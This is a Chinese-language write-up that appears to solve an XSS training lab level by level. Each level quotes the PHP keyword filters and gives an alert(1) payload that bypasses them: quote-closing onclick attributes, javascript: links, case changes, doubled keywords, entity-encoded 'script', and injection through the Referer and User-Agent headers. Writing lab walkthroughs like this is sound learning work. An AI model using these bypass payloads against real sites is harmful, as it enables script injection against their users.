level-3

过滤<但是没有过滤',使用'可以闭合前面的'再用元素定义onclick即可

payload

/level3.php?keyword='onclick='alert(1)''&submit=搜索

即可点一下输入框

level-5

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

过滤了<scripton,我们可以使用伪标签

"><a href="javascript:alert(1)">

level-6

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

html大小写不敏感

可以大写绕过


"><a hRef="javascript:alert(1)">"

level-7

一眼双写绕过

$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

"oonnclick='alert(1)'"

level-8

$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

这里由于是直接在href参数里,所以可以直接使用html编码,使用伪协议


javas%26%2367%3Bript:alert(1)

level-9

这里限制了只能传合法的链接,但是合法链接尽然不包含https开头的

查看源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>

可以发现字符"被替换了,但是可以通过html实体绕过

需要含有 http:\/\/ 直接注释掉即可

javas%26%2367%3Bript:alert(1);//http://

level-10

先直接测试,本来想反射形的,但发现都过滤了查看html源码可以发现有隐藏的input

写一个submit,看看有没有问题

再测试一下

这里有回显,发现没有过滤",那么就可以狠狠的试一试了

http://192.168.86.130:51142/level10.php?t_link=a&t_history=a&t_sort=" onclick='alert(1)' type='text'

level-11

最开始也是将隐藏去掉测试参数

发现对"过滤了,没法通过回显来xss

注意到隐藏中的有个t_ref,这就有点脑洞了,这个对应的应该是referer,使用hackbar

" onclick='alert(1)' type='text'"

level-12

这次是返回User-Agent

" onclick="alert(1)" type='text'

level-13

docker环境没配好,这关有问题,总之就是会设置一个cookie,对应回显也是cookie

level-15

ng-include:用于包含外部的 HTML 文件
我们可以引入第一个文件,然后xss即可

一个好奇的人